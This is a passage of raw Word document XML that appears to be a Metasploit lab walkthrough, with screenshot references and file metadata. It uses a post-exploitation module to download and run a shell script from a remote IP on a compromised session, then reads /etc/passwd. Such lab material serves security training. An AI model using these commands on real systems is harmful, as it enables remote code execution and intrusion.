      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>download_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59D89EEB" w14:textId="2291439F" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set URL http://</w:t>
      </w:r>
      <w:r w:rsidR="00B71516" w:rsidRPr="00B71516">
        <w:t>192.24.81.2</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t>/test.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66557F00" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F616D6" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D708E7" w14:textId="75D8B52D" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="00B71516" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15AB6328" wp14:editId="55EDB3B9">
            <wp:extent cx="5334274" cy="2171812"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1440158201" name="Picture 5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158201" name="Picture 51" descr="A screen shot of a computer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274" cy="2171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D54D1" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>Let’s verify it by interacting with the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522BBA07" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C9228" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFECCA" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656455F1" w14:textId="2AEE08BD" w:rsidR="000C4275" w:rsidRDefault="00B71516">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D5E78BE" wp14:editId="77D69430">
            <wp:extent cx="5670841" cy="4362674"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1483013759" name="Picture 5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013759" name="Picture 52" descr="A screenshot of a computer&#10;&#10;AI-generated content may b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0841" cy="4362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42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3272B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0C6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61375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D1F"/>
    <w:rsid w:val="000C4275"/>
    <w:rsid w:val="0010744E"/>
    <w:rsid w:val="00116991"/>
    <w:rsid w:val="00312D31"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006B0C35"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00B23D1F"/>
    <w:rsid w:val="00B71516"/>
    <w:rsid w:val="00B82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D0F55"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AC5B7ED8-7C68-4E61-AFEC-B6F7274EF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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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3D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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.tmp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tmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.tmp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.tmp"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.tmp"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.tmp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image" Target="media/image7.tmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.tmp"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tmp"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.tmp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image" Target="media/image10.tmp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13</Pages>
  <Words>415</Words>
  <Characters>3767</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>96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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-17T06:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T07:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>